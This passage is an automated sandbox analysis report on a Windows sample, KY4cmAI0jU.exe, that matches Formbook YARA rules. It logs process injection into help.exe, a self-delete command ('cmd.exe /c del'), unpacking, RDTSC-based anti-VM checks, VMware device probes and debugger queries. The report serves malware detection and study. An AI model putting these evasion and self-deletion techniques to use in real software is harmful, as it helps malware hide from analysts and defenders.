          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0D5E06_2_02F0D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC25DD6_2_02FC25DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F225816_2_02F22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB2D826_2_02FB2D82
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC1D556_2_02FC1D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF0D206_2_02EF0D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC2D076_2_02FC2D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C87B6_2_0057C87B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00568C706_2_00568C70
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00568C6B6_2_00568C6B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057CC9C6_2_0057CC9C
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C5486_2_0057C548
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00562D906_2_00562D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00562D876_2_00562D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00562FB06_2_00562FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C7AF6_2_0057C7AF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: String function: 00419F80 appears 40 times
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: String function: 00ACB150 appears 136 times
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02EFB150 appears 145 times
          Source: KY4cmAI0jU.exe, 00000000.00000003.213687683.0000000009946000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exe, 00000001.00000002.266447217.0000000000D4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exe, 00000001.00000002.266145503.0000000000A44000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs KY4cmAI0jU.exe
          Source: KY4cmAI0jU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@13/8
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404356
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile created: C:\Users\user\AppData\Local\Temp\nssF13E.tmpJump to behavior
          Source: KY4cmAI0jU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: KY4cmAI0jU.exeVirustotal: Detection: 34%
          Source: KY4cmAI0jU.exeMetadefender: Detection: 17%
          Source: KY4cmAI0jU.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile read: C:\Users\user\Desktop\KY4cmAI0jU.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'Jump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: KY4cmAI0jU.exe, 00000000.00000003.213745090.00000000099C0000.00000004.00000001.sdmp, KY4cmAI0jU.exe, 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, help.exe, 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: KY4cmAI0jU.exe, help.exe
          Source: Binary string: help.pdbGCTL source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeUnpacked PE file: 1.2.KY4cmAI0jU.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_73752F60 push eax; ret 0_2_73752F8E
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041C9AD push eax; ret 1_2_0041C9BC
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0040D291 push ebp; iretd 1_2_0040D296
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041B3C5 push eax; ret 1_2_0041B418
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0040C394 pushad ; ret 1_2_0040C3E3
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041B47C push eax; ret 1_2_0041B482
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041B412 push eax; ret 1_2_0041B418
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041B41B push eax; ret 1_2_0041B482
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00414E45 push ebp; iretd 1_2_00414E48
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004106D4 push cs; iretd 1_2_004106D7
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00414F4F push ss; ret 1_2_00414F5F
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B1D0D1 push ecx; ret 1_2_00B1D0E4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041C9AD push eax; ret 1_1_0041C9BC
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0040D291 push ebp; iretd 1_1_0040D296
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041B3C5 push eax; ret 1_1_0041B418
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0040C394 pushad ; ret 1_1_0040C3E3
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041B47C push eax; ret 1_1_0041B482
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041B412 push eax; ret 1_1_0041B418
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041B41B push eax; ret 1_1_0041B482
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00414E45 push ebp; iretd 1_1_00414E48
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004106D4 push cs; iretd 1_1_004106D7
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00414F4F push ss; ret 1_1_00414F5F
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F4D0D1 push ecx; ret 6_2_02F4D0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C9AD push eax; ret 6_2_0057C9BC
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0056D291 push ebp; iretd 6_2_0056D296
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057B3C5 push eax; ret 6_2_0057B418
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0056C394 pushad ; ret 6_2_0056C3E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057B47C push eax; ret 6_2_0057B482
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057B412 push eax; ret 6_2_0057B418
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057B41B push eax; ret 6_2_0057B482
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057C4F5 push cs; iretd 6_2_0057C4F7
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile created: C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Windows\explorer.exe TID: 6128Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 5796Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000002.00000000.244267378.0000000001398000.00000004.00000020.sdmpBinary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.234998239.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.227568679.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAv
          Source: explorer.exe, 00000002.00000000.255829741.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.235308086.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000002.00000000.228165850.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.232695480.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00409B30 LdrLoadDll,1_2_00409B30
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]1_2_00AF20A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFF0BF mov ecx, dword ptr fs:[00000030h]1_2_00AFF0BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]1_2_00AFF0BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]1_2_00AFF0BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B090AF mov eax, dword ptr fs:[00000030h]1_2_00B090AF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9080 mov eax, dword ptr fs:[00000030h]1_2_00AC9080
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]1_2_00B43884
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]1_2_00B43884
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC58EC mov eax, dword ptr fs:[00000030h]1_2_00AC58EC
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB8E4 mov eax, dword ptr fs:[00000030h]1_2_00AEB8E4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB8E4 mov eax, dword ptr fs:[00000030h]1_2_00AEB8E4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC40E1 mov eax, dword ptr fs:[00000030h]1_2_00AC40E1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC40E1 mov eax, dword ptr fs:[00000030h]1_2_00AC40E1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC40E1 mov eax, dword ptr fs:[00000030h]1_2_00AC40E1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B5B8D0
